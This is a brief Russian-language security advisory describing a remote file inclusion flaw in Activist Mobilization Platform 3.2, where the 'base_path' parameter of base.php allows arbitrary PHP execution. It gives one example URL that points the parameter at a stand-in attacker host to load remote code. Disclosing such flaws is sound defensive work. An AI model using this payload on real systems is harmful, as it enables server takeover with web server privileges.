Программа: Activist Mobilization Platform (AMP) 3.2

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «base_path» сценарием base.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://localhost/amp-3.2/includes/base.php?base_path=http://atacker.com/inject.txt?



Оставить мнение